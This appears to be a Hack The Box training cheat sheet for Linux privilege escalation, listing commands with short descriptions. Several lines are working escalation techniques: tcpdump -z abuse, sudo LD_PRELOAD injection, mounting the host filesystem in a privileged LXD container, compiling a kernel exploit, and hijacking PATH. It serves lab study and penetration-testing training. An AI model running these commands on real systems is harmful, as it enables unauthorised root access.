ssh htb-student@<target IP> |
SSH to lab target |
ps aux | grep root |
See processes running as root |
ps au |
See logged in users |
ls /home |
View user home directories |
ls -l ~/.ssh |
Check for SSH keys for current user |
history |
Check the current user's Bash history |
sudo -l |
Can the user run anything as another user? |
ls -la /etc/cron.daily |
Check for daily Cron jobs |
lsblk |
Check for unmounted file systems/drives |
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null |
Find world-writeable directories |
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null |
Find world-writeable files |
uname -a |
Check the Kernel versiion |
cat /etc/lsb-release |
Check the OS version |
gcc kernel_expoit.c -o kernel_expoit |
Compile an exploit written in C |
screen -v |
Check the installed version of Screen |
./pspy64 -pf -i 1000 |
View running processes with pspy |
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null |
Find binaries with the SUID bit set |
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null |
Find binaries with the SETGID bit set |
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root |
Priv esc with tcpdump |
echo $PATH |
Check the current user's PATH variable contents |
PATH=.:${PATH} |
Add a . to the beginning of the current user's PATH |
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null |
Search for config files |
ldd /bin/ls |
View the shared objects required by a binary |
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart |
Escalate privileges using LD_PRELOAD |
readelf -d payroll | grep PATH |
Check the RUNPATH of a binary |
gcc src.c -fPIC -shared -o /development/libshared.so |
Compiled a shared libary |
lxd init |
Start the LXD initialization process |
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine |
Import a local image |
lxc init alpine r00t -c security.privileged=true |
Start a privileged LXD container |
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true |
Mount the host file system in a container |
lxc start r00t |
Start the container |
showmount -e 10.129.2.12 |
Show the NFS export list |
sudo mount -t nfs 10.129.2.12:/tmp /mnt |
Mount an NFS share locally |
tmux -S /shareds new -s debugsess |
Created a shared tmux session socket |
./lynis audit system |
Perform a system audit with Lynis |